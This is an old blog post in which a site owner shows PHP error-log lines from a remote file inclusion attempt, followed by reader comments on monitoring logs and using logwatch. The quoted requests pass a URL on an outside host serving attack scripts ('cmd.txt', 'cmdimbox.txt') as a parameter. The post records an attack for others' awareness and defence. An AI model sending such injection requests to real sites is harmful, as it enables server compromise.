A Single Article
Read it, comment, and share it with your friendsRandom hacking attempt
I just happened to have PuTTY open with shell access to my server and I was monitoring the error_log for this domain when I noticed these errors popping up:
[Thu Nov 15 14:46:52 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/2007/11/09/php-techniques-i-use-all-the-time/home.php?i=http://201.37.71.117:8090/cmd.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38 [Thu Nov 15 14:46:54 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/home.php?i=http://201.37.71.117:8090/cmd.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38 [Thu Nov 15 14:47:01 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/2007/11/09/php-techniques-i-use-all-the-time/home.php?i=http://201.37.71.117:8090/cmdimbox.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38 [Thu Nov 15 14:47:02 2007] [error] [client 85.214.78.190] PHP Warning: parse_url(/home.php?i=http://201.37.71.117:8090/cmdimbox.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /.../httpdocs/wp-content/plugins/ylsy_permalink_redirect.php on line 38
I’m not expert when it comes to hacking but I could tell what was going on here so I decided to check out the addresses that were being passed:
http://201.37.71.117:8090/cmd.txt
If you go there, you will find a very nice set of PHP commands that attempt to expose holes and security information and etc.
http://201.37.71.117:8090/cmdimbox.txt
I don’t quite understand this one, but the comments say:
scan inb0x hotmail v1.0
I don’t know if the owner of the server is the one using this script, because the server appears to be a game server:
Maybe this post will alert the owner of the server… I’m probably going to keep my error log open much more often now.
Get a Trackback link
6 Comments
Responses to my articleInteresting and very scary these type of things. Could you write a post about how you monitor that error log?
i’m not so sure the owner would be that bothered - try googling the ip address, its been busy for a while!
I guess that second script is just trying to get the user PHP is running as (by emailing it back to them) so they can try to log in via ssh or whatever - once you have a valid username your half way there!
I’ll just share it here… I have Plesk on my server that handles the vhosts directory to host all my domains so my error_log file is here:
/var/www/vhosts/domain.com/statistics/logs/error_log
This log is for all script errors… apache errors and mail errors have their own logs that are not domain-specific. Anyway, this is the address and to “monitor” the log I just need to watch the end of it which I do with:
tail -f addressWhere “address” is the long path I just showed you.
If I see something in the log that I want to copy, it’s just highlight, right-click in PuTTY.
I don’t allow error reporting in my PHP scripts so I monitor this log to see errors, this is less convenient but more secure. I actually spotted these hacking attempts because I was monitoring the logs to debug my latest Facebook app: Mob Art
ns: Good catch, it’s a launch pad for hackers.
you might want to try something like ‘logwatch’ which will pick up on these anomalies and email you when it finds something - it might already be installed, at least it is with Fedora. Its worthwhile because you will pick up on these things as they are happening
thanks. will definitely give it a try.
Leave a comment
Share your thoughts with the worldYou can use Markdown, or you can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>Please keep comments respectful and on topic.
This form is guarded by Akismet, so don't waste your time trying to submit spam. It won't work. Ever.